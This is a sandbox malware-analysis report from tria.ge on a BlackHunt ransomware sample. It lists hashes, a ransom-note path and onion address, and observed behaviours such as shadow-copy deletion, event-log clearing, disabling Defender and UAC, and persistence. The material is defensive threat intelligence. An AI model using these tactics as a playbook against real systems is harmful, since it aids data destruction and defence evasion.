Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
12s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:07
Static task
static1
Behavioral task
behavioral1
Sample
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe
Resource
win10v2004-20231222-en
General
-
Target
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe
-
Size
707KB
-
MD5
5a0a0ea1a14e9fced35ed042253b317f
-
SHA1
b7d6e78e607a9e9ed9d180a4a257c4b29f9bfe9b
-
SHA256
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7
-
SHA512
0b1f7adbdfa087a597ffc76d76ace2f15ca7691c7c274a731d3c9b258fd9356a573a488b7d7e08bbac3a0c03188b93280ebf9c64b6a4b561be3fe8d5c94cd83a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F89vnh:6uaTmkZJ+naie5OTamgEoKxLWoJh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 11116 fsutil.exe 1592 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7936 wevtutil.exe 7968 wevtutil.exe 10452 wevtutil.exe 11268 wevtutil.exe 11120 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6096 bcdedit.exe 8660 bcdedit.exe 10276 bcdedit.exe 8252 bcdedit.exe -
Renames multiple (2015) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1552 wbadmin.exe 8348 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\E: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\R: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\A: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\I: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\H: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\L: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\T: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\S: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\M: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\K: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\V: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\G: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\J: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\N: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\Z: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\X: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\Y: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\U: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\O: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\B: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\ui-strings.js 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateDCFiles_280x192.svg 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected-hover.svg 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\pt-br\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\GRAY.pf 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\ui-strings.js 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\he-il\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\misc\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\currency.data 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\ui-strings.js 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\en-gb\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\asm.md 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\ui-strings.js 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-default.svg 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 10064 10196 WerFault.exe 259 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5972 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5996 vssadmin.exe 5840 vssadmin.exe 5820 vssadmin.exe 8776 vssadmin.exe 7852 vssadmin.exe 7912 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 12424 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6204 PING.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeRestorePrivilege 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeBackupPrivilege 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeTakeOwnershipPrivilege 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeAuditPrivilege 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeSecurityPrivilege 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeIncBasePriorityPrivilege 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeBackupPrivilege 6008 vssvc.exe Token: SeRestorePrivilege 6008 vssvc.exe Token: SeAuditPrivilege 6008 vssvc.exe Token: SeBackupPrivilege 9460 wbengine.exe Token: SeRestorePrivilege 9460 wbengine.exe Token: SeSecurityPrivilege 9460 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4636 wrote to memory of 8 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 101 PID 4636 wrote to memory of 8 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 101 PID 4636 wrote to memory of 2904 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 99 PID 4636 wrote to memory of 2904 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 99 PID 4636 wrote to memory of 2060 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 94 PID 4636 wrote to memory of 2060 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 94 PID 4636 wrote to memory of 4856 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 98 PID 4636 wrote to memory of 4856 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 98 PID 4636 wrote to memory of 4644 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 105 PID 4636 wrote to memory of 4644 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 105 PID 4636 wrote to memory of 2720 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 104 PID 4636 wrote to memory of 2720 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 104 PID 4636 wrote to memory of 932 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 106 PID 4636 wrote to memory of 932 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 106 PID 4636 wrote to memory of 1508 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 218 PID 4636 wrote to memory of 1508 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 218 PID 4636 wrote to memory of 4200 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 217 PID 4636 wrote to memory of 4200 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 217 PID 8 wrote to memory of 4740 8 cmd.exe 216 PID 8 wrote to memory of 4740 8 cmd.exe 216 PID 4636 wrote to memory of 2764 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 111 PID 4636 wrote to memory of 2764 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 111 PID 2060 wrote to memory of 2744 2060 cmd.exe 109 PID 2060 wrote to memory of 2744 2060 cmd.exe 109 PID 4636 wrote to memory of 3220 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 113 PID 4636 wrote to memory of 3220 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 113 PID 2904 wrote to memory of 2940 2904 cmd.exe 112 PID 2904 wrote to memory of 2940 2904 cmd.exe 112 PID 4636 wrote to memory of 4460 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 215 PID 4636 wrote to memory of 4460 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 215 PID 4636 wrote to memory of 3480 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 116 PID 4636 wrote to memory of 3480 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 116 PID 4636 wrote to memory of 1252 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 119 PID 4636 wrote to memory of 1252 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 119 PID 4636 wrote to memory of 1528 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 118 PID 4636 wrote to memory of 1528 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 118 PID 4636 wrote to memory of 4988 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 130 PID 4636 wrote to memory of 4988 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 130 PID 4636 wrote to memory of 4796 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 128 PID 4636 wrote to memory of 4796 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 128 PID 4636 wrote to memory of 3180 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 127 PID 4636 wrote to memory of 3180 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 127 PID 4636 wrote to memory of 2696 4636 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 123 PID 4636 wrote to memory of 2696 4636 